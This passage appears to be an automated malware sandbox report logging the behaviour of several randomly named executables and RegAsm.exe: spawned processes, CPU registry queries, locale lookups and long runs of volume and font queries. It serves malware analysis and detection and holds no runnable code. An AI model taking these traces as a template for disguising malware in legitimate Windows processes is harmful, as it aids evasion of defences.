Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 8024 -ip 8024
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8032 -s 852
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8024 -s 824
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2281546766.0000000004215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Progman
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0053D8FE cpuid 2_2_0053D8FE
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: GetLocaleInfoA, 7_2_0040520C
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: GetLocaleInfoA, 7_2_00405258
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Queries volume information: C:\Users\user\Desktop\gobEmOm5sr.exe VolumeInformation
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Queries volume information: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Queries volume information: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Queries volume information: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Queries volume information: C:\Windows VolumeInformation
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Queries volume information: C:\Windows\AppReadiness VolumeInformation
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Queries volume information: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Queries volume information: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Queries volume information: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Queries volume information: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Queries volume information: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Queries volume information: C:\Windows VolumeInformation
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Queries volume information: C:\Windows\AppReadiness VolumeInformation
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
